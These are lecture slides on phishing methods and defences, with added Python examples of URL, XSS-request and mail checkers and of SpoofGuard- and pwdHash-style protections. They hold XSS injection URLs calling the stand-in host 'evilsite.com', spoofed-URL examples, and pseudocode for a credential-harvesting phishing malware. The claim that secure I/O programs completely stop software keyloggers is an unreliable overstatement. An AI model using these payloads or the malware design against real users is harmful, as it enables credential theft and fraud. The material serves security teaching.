Phishing and Anti-phishing Techniques


22c:169 Computer Security
Phishing and Anti-phishing Techniques
Dat Tien Nguyen, Xin Xiao

Introduction


Definition: “Phishing is the practice of sending out fake emails, or spam, written to appear as if they have been sent by banks or other reputable organizations, with the intent of luring the recipient into revealing sensitive information such as usernames, passwords, account IDs, ATM PINs or credit card details.” (Know your enemy: Phishing, http://www.honeynet.org/papers/phishing/ ).

Introduction

(Two charts of phishing statistics; source: APWG. Figures not reproduced in the extracted text.)

Phishing will always be a serious danger.

Phishing techniques

* Phishing through compromised web servers
* Phishing through port redirection
* Phishing using botnets
* Phishing using keyloggers


Phishing through compromised web servers

The attack proceeds as follows:
1. Attackers scan for vulnerable servers.
2. A server is compromised and a rootkit or password-protected backdoor is installed.
3. Phishers gain access to the server through this encrypted backdoor.
4. If the compromised server is a web server, pre-built phishing web sites are downloaded.
5. Some limited content configuration and web site testing is performed.
6. Mass-emailing tools are downloaded and used to advertise the fake web site via spam email.
7. Web traffic begins to arrive at the phishing web site and potential victims access the malicious content.

More detailed case studies: www.honeynet.org

Phishing through port redirection

The port redirection service is designed to reroute HTTP requests sent to the honeypot web server to another remote web server in a transparent manner, potentially making the location of the content source harder to trace. The hacker downloaded and installed a tool called redir on the honeypot, which was a port redirector utility designed to transparently forward incoming TCP connections to a remote destination host.

Phishing using botnets

Definition: “A botnet is a network of compromised computers that can be remotely controlled by an attacker.” (source: Know your enemy: Phishing, http://www.honeynet.org/papers/phishing/)

* Email and spam
* Cross-site scripting attacks
* Distributed phishing attacks


Email and Spam

Misspelled URLs
http://www.yourbank.com.example.com/

Using the @ symbol
http://www.google.com@members.tripod.com

Using Unicode characters
http://www.pаypal.com/ (where the first a is replaced by a Cyrillic а)

Hiding/replacing the address bar
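The three URL tricks above (brand name in a subdomain, the @ userinfo decoy, and Unicode look-alikes) can all be spotted by parsing the URL instead of reading it. The following checker is an added example written for this page, not code from the slides or from any of the tools they cite; the PROTECTED_BRANDS set and the two-label "registered domain" rule are simplifying assumptions.

```python
import unicodedata
from urllib.parse import urlsplit

# Constructed set of brand domains worth protecting (assumption for this example, not a real feed).
PROTECTED_BRANDS = {"yourbank.com", "google.com", "paypal.com"}


def registered_domain(host: str) -> str:
    """Naive eTLD+1: the last two labels of the host (ignores multi-label public suffixes such as co.uk)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def letter_scripts(host: str) -> set:
    """Unicode script names of the letters in a host, e.g. {'LATIN', 'CYRILLIC'}."""
    return {unicodedata.name(ch, "UNKNOWN").split()[0] for ch in host if ch.isalpha()}


def url_findings(url: str) -> list:
    """Return deception indicators for a URL; an empty list means none of the three tricks was seen."""
    findings = []
    parts = urlsplit(url)
    host = parts.hostname or ""

    # Trick 1: the '@' symbol. Everything before '@' is userinfo, so 'www.google.com' is only a
    # decoy and the browser actually connects to the host after the '@'.
    if parts.username is not None:
        findings.append(f"userinfo-decoy: shows '{parts.username}' but connects to '{host}'")

    # Trick 2: Unicode look-alikes. A Cyrillic 'а' renders like Latin 'a'; mixed or non-Latin
    # scripts in a host that otherwise looks ASCII is the homograph signal.
    scripts = letter_scripts(host)
    if len(scripts) > 1 or (scripts and "LATIN" not in scripts):
        findings.append(f"homograph: host mixes scripts {sorted(scripts)}")

    # Trick 3: a real brand name placed in the subdomain of an unrelated registered domain.
    reg = registered_domain(host) if host else ""
    for brand in sorted(PROTECTED_BRANDS):
        if brand != reg and brand in host:
            findings.append(f"brand-in-subdomain: '{brand}' appears under '{reg}'")
    return findings


if __name__ == "__main__":
    for sample in ("http://www.yourbank.com.example.com/",
                   "http://www.google.com@members.tripod.com",
                   "http://www.p\u0430ypal.com/",
                   "https://www.paypal.com/signin"):
        print(sample, "->", url_findings(sample) or "clean")
```

The host comparison deliberately works on the parsed hostname, not on the string the user sees: that is the whole point of the @ trick, and it is why a display-string check would miss it.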

Email and Spam

Inserting random words or zero-size pictures to pass the spam filters

Cross-site Scripting Attacks

Cross-site scripting attacks (CSS or XSS) make use of custom URL or code injection into a valid web-based application URL or embedded data field. In general, these CSS techniques are the result of poor web-application development processes. While there are numerous vectors for carrying out a CSS attack, phishers must make use of URL-formatted attacks. Typical formats for CSS injection into valid URLs include:

Full HTML substitution:
http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm

Inline embedding of scripting content:
http://mybank.com/ebanking?page=1&client=<SCRIPT>evilcode...

Forcing the page to load external scripting code:
http://mybank.com/ebanking?page=1&response=evilsite.com%21evilcode.js&go=2
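The three URL formats above share one root cause: the application trusts a query parameter as a redirect target, as HTML, or as a script location. The following is an added example (written for this page, not taken from the slides or the honeynet paper) with two sides: a classifier that recognises each of the three formats in a request URL, which is what a proxy or log review would run, and the hardened handler logic that stops them (an allowlisted redirect and HTML escaping). The hostname mybank.com and the ALLOWED_REDIRECT_HOSTS set are assumptions for the example.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Hosts the e-banking application may redirect to (constructed allowlist for this example).
ALLOWED_REDIRECT_HOSTS = {"mybank.com", "www.mybank.com"}


def request_findings(url: str) -> list:
    """Classify query parameters of a request URL by the three injection formats on the slide."""
    findings = []
    parts = urlsplit(url)
    app_host = (parts.hostname or "").lower()
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:          # parse_qs has already percent-decoded the value (%21 -> !)
            low = value.lower()
            # Full HTML substitution: a parameter carrying an absolute URL to a foreign host.
            if low.startswith(("http://", "https://", "//")):
                target = (urlsplit(value).hostname or "").lower()
                if target and target != app_host:
                    findings.append(f"external-redirect: {name} -> {target}")
            # Inline embedding: markup or script in a parameter the page echoes back.
            if "<script" in low or "javascript:" in low or "onerror=" in low:
                findings.append(f"inline-script: {name}")
            # External script load: a host!file.js style reference that is not the application itself.
            if low.endswith(".js") and app_host not in low:
                findings.append(f"external-script: {name} -> {value}")
    return findings


def safe_redirect_target(param: str) -> str:
    """Hardened handling of a redirect parameter: honour only same-site paths or allowlisted
    hosts, and fall back to the application root for anything else."""
    parts = urlsplit(param)
    if (parts.scheme == "" and parts.netloc == "" and parts.path.startswith("/")
            and not parts.path.startswith(("//", "/\\"))):
        return parts.path                       # relative path on the application itself
    if parts.scheme in ("http", "https") and (parts.hostname or "").lower() in ALLOWED_REDIRECT_HOSTS:
        return param
    return "/"


def render_client(client: str) -> str:
    """Echo a client-supplied value into HTML only after escaping, so '<SCRIPT>' stays inert text."""
    return f"<p>Welcome, {html.escape(client, quote=True)}</p>"


if __name__ == "__main__":
    for u in ("http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm",
              "http://mybank.com/ebanking?page=1&client=<SCRIPT>evilcode...",
              "http://mybank.com/ebanking?page=1&response=evilsite.com%21evilcode.js&go=2"):
        print(u, "->", request_findings(u))
    print(safe_redirect_target("http://evilsite.com/phishing/fakepage.htm"))
    print(render_client("<SCRIPT>evilcode..."))
```

The classifier is a review aid, not a security boundary: the handler side is what removes the vulnerability, because an allowlist and output escaping do not depend on recognising the attacker's encoding.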


Distributed Phishing Attack

Idea: use multiple collection centers. A collection center is a web site or server the phisher uses to collect victims’ information. Purpose: hard to detect.

Phishers post software that is free for download; this software can be triggered by the phisher.

Method: using malware.

Components of the malware: the distributed phishing attack makes use of distributed computation (fault tolerance), cryptovirology, and public-key steganography. It includes the transmitter application, the transponder cryptotrojan, and the receiver application.

Distributed Phishing Attack

Transmitter():
  Input: none
  Output: phishing e-mail that has a forged source e-mail address
  Nonvolatile storage: L1 is a set of e-mail addresses of potential phishing victims; L2 = {(s1, s2) : s1 is the e-mail address of an impersonated organization and s2 is the URL of the phishing page that impersonates s1}.
  1. if L1 is the empty list then halt
  2. select address a ∈R L1
  3. set L1 = L1 \ {a}
  4. select (s1, s2) = ti ∈R L2
  5. construct the body of the phishing e-mail message θ that includes a hyperlink to s2
  6. e-mail θ to a using forged source e-mail address s1

Transponder_i(y):
  Input: public encryption key y of the phisher
  Output: stegotext message c
  Nonvolatile storage: L3 is a set of data files that each support steganographic information transfer.
  1. if L3 is the empty list then halt (i.e., site no longer services HTTP requests)
  2. present a login prompt and a “sign in” button to users that establish a web connection
  3. if the user enters a login and password pair and clicks on “sign in” then:
  4.   let α denote the login and password pair
  5.   present a forged page of content, or indicate an HTTP error, etc.
  6.   choose d ∈R L3
  7.   set L3 = L3 \ {d}
  8.   set m = α || i
  9.   c = StegoEnc(y, d, m)
  10.  post c anonymously to one or more bulletin boards B

Receiver(x, c):
  Input: private decryption key x of the phisher and stegotext c
  Output: FAILURE or the login and password pair α along with i
  1. (m, errcode) = StegoDec(x, c)
  2. if errcode = FAILURE then halt with FAILURE
  3. extract the login pair α and integer i from m = α || i
  4. output (α, i) and halt

Note that if α is a proper login and password pair to an account at organization i, then (α, i) gives the phisher access to this account.

Phishing using keyloggers

Definition: “A keylogger is something that records keystrokes made on a computer. It captures every key pressed on the keyboard and stores it down in a file or memory bank that can be viewed by the person performing the monitoring in real-time, or at a later date.” (http://www.keyghost.com/keylogger/). There are two types of keylogger: hardware keyloggers and software keyloggers.

Hardware Keylogger

Three types (www.wikipedia.org):
* Inline devices that are attached to the keyboard cable
* Devices which can be installed inside standard keyboards
* Actual replacement keyboards that contain the keylogger already built in

A hardware keylogger can only be discovered by physically inspecting the machine and must be removed physically.

Software Keylogger

* Can capture both keys pressed and the screen
* Two sub-categories (www.keyghost.com):
  * Visible in the task manager
  * Invisible and stealth keyloggers
* It is true that secure I/O programs can completely protect your computer from software keyloggers

Anti-phishing technologies

Introduction: anti-phishing techniques are used to prevent and detect phishing attacks.

Anti-phishing techniques

Email filtering
* may be configured to identify specific known phishing messages
* prevents them from reaching users
* may also erroneously block legitimate email
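Two earlier points meet here: the spam-filter evasion slide (random words and zero-size pictures) and the note that filtering "may also erroneously block legitimate email". The following mail inspector is an added example written for this page, not code from the slides or from any filtering product: it holds a message when a link points at a host on a known-phishing list or when the HTML carries an image sized to be invisible. The blocklist and the three sample messages are constructed; the newsletter sample shows the false positive the slide warns about, because a harmless open-tracking pixel trips the same zero-size rule.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed blocklist: hosts seen in previously reported phishing mails (assumption for this example).
KNOWN_PHISHING_HOSTS = {"www.yourbank.com.example.com", "members.tripod.com"}


class MailInspector(HTMLParser):
    """Collects link target hosts and counts images sized to be invisible (width or height 0)."""

    def __init__(self):
        super().__init__()
        self.link_hosts = []
        self.hidden_images = 0

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}          # valueless attributes arrive as None
        if tag == "a" and a.get("href"):
            self.link_hosts.append((urlsplit(a["href"]).hostname or "").lower())
        elif tag == "img":
            dims = (a.get("width", "").strip().lower(), a.get("height", "").strip().lower())
            if any(d in ("0", "0px") for d in dims):
                self.hidden_images += 1


def filter_mail(html_body: str) -> dict:
    """Return the filter decision and the reasons, so an operator can see why a message was held."""
    p = MailInspector()
    p.feed(html_body)
    p.close()
    reasons = [f"known-phishing-link:{h}" for h in p.link_hosts if h in KNOWN_PHISHING_HOSTS]
    if p.hidden_images:
        reasons.append(f"zero-size-images:{p.hidden_images}")
    return {"block": bool(reasons), "reasons": reasons}


# Constructed sample messages (not real mail).
PHISHING_MAIL = """<html><body>
<p>Dear customer, your account was suspended. Please
<a href="http://www.yourbank.com.example.com/">sign in</a>.</p>
<img src="http://www.yourbank.com.example.com/t.gif" width="0" height="0">
<p style="font-size:0">lorem aardvark quartz zephyr</p>
</body></html>"""

LEGIT_MAIL = """<html><body><p>Your statement is ready at
<a href="https://www.yourbank.com/statements">yourbank.com</a>.</p></body></html>"""

NEWSLETTER_WITH_PIXEL = """<html><body><p>This month's news.</p>
<img src="https://news.example.net/open.gif" width="1" height="0"></body></html>"""

if __name__ == "__main__":
    for label, body in (("phishing", PHISHING_MAIL), ("legit", LEGIT_MAIL),
                        ("newsletter", NEWSLETTER_WITH_PIXEL)):
        print(label, "->", filter_mail(body))
```

A production filter would score these signals rather than block on any one of them, precisely so that the tracking-pixel case becomes a low-weight hint instead of a dropped message.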


Browser extensions
* SpoofGuard
* pwdHash
* BSCI (browser secure connection indicators)
* Browser-based phishing defenses


SpoofGuard

Stateless page evaluation:
* URL check
* Image check
* Link check
* Password check
* Domain check
* Referring page
* Image-domain association

Stateful page evaluation

Evaluation of post data
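The stateful part of SpoofGuard, the evaluation of post data, is the check that fires at the moment that matters: when a password the user has already used at one site is about to be posted to another. The class below is an added illustration of that idea written for this page, not SpoofGuard's own code. It stores only an HMAC fingerprint of each password under a per-installation secret key, plus the sites it was posted to; the two-label site-domain rule and the field-name heuristic for spotting password fields are simplifying assumptions.

```python
import hashlib
import hmac
import os
from typing import Optional
from urllib.parse import urlsplit


def site_domain(url: str) -> str:
    """Naive registered domain (last two host labels), so www.mybank.com and online.mybank.com
    count as the same site."""
    host = (urlsplit(url).hostname or "").lower()
    return ".".join(host.split(".")[-2:])


class PostDataGuard:
    """SpoofGuard-style stateful check of POST data (an illustration, not SpoofGuard's code).

    Only a keyed fingerprint of each password is kept, never the password, together with the
    sites it was posted to. When the same password is later posted to a different site the
    guard warns: that is the moment a user is about to hand a bank password to a look-alike page.
    """

    def __init__(self, key: Optional[bytes] = None):
        self.key = key or os.urandom(32)   # per-installation secret; a leaked table is useless without it
        self.seen: dict = {}               # fingerprint -> set of site domains

    def fingerprint(self, password: str) -> str:
        return hmac.new(self.key, password.encode("utf-8"), hashlib.sha256).hexdigest()

    def inspect_post(self, url: str, form: dict) -> list:
        """Return warnings for password fields whose value was previously sent to another site."""
        site = site_domain(url)
        warnings = []
        for field, value in form.items():
            if not any(tag in field.lower() for tag in ("pass", "pwd")):
                continue                   # only password-like fields are fingerprinted
            fp = self.fingerprint(value)
            prior = self.seen.setdefault(fp, set())
            elsewhere = sorted(d for d in prior if d != site)
            if elsewhere:
                warnings.append(f"{field}: password already used at {elsewhere} is being posted to {site}")
            prior.add(site)
        return warnings


if __name__ == "__main__":
    guard = PostDataGuard()
    print(guard.inspect_post("https://www.mybank.com/login", {"user": "alice", "password": "s3cret"}))
    print(guard.inspect_post("http://www.mybank.com.example.com/login", {"user": "alice", "password": "s3cret"}))
```

The warning is deliberately raised before the site is recorded, so the first submission to a new site is what triggers it; a user who genuinely reuses one password everywhere will see the warning too, which is the same trade-off SpoofGuard makes.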

pwdHash

Hash(pwd, dom) = PRF_pwd(dom), where PRF is a pseudorandom function keyed by the user's password and applied to the site's domain name.
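The formula Hash(pwd, dom) = PRF_pwd(dom) is worth seeing in running code, because the protection is in the key placement: the password is the PRF key and the domain is the message, so the value a phishing page receives is bound to the phishing page's own domain and is worthless at the real site. The function below is an added example for this page, not the pwdHash extension's code; HMAC-SHA256 as the PRF and the 12-character base64 truncation are choices made for the example, and the caller is assumed to pass the site's domain already extracted from the URL.

```python
import base64
import hashlib
import hmac


def pwdhash(password: str, dom: str, length: int = 12) -> str:
    """Hash(pwd, dom) = PRF_pwd(dom): the password keys the PRF, the site domain is the message.
    HMAC-SHA256 is used as the PRF here (an assumption for this example)."""
    dom = dom.lower().strip(".")          # normalise so MyBank.com and mybank.com agree
    mac = hmac.new(password.encode("utf-8"), dom.encode("utf-8"), hashlib.sha256).digest()
    # Base64 keeps the site password printable; truncate to the length the site accepts.
    return base64.b64encode(mac).decode("ascii")[:length]


def fake_page_learns_real_password(master_password: str, real_site: str, fake_site: str) -> bool:
    """True only if the value posted to fake_site would also log the user in at real_site."""
    return pwdhash(master_password, fake_site) == pwdhash(master_password, real_site)


if __name__ == "__main__":
    master = "correct horse"
    print("mybank.com              ->", pwdhash(master, "mybank.com"))
    print("mybank.com.example.com  ->", pwdhash(master, "mybank.com.example.com"))
    print("phisher gains real login:", fake_page_learns_real_password(master, "mybank.com", "mybank.com.example.com"))
```

The derived value is still a function of the master password, so a phisher holding PRF_pwd(fake.dom) can try to guess pwd offline; pwdHash therefore reduces the damage of a successful phish rather than removing the need for a strong master password.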


BSCI

Browser’s secure connection indicators:
* Padlock icon
* Certificate dialog
* Location bar
* Menu bar

All of these can be tampered with by attackers!

Tamper-resistant BSCIs: authenticate the BSCI with individually chosen bitmaps or messages.

Evaluation of current anti-phishing toolbars

Some popular anti-phishing toolbars:
* Netcraft Anti-Phishing Toolbar
* Google Toolbar
* TrustWatch Toolbar
* SpoofGuard
* Cloudmark’s Anti-Fraud Toolbar

Evaluation result (chart not reproduced in the extracted text)

Thank you for your attention

Questions?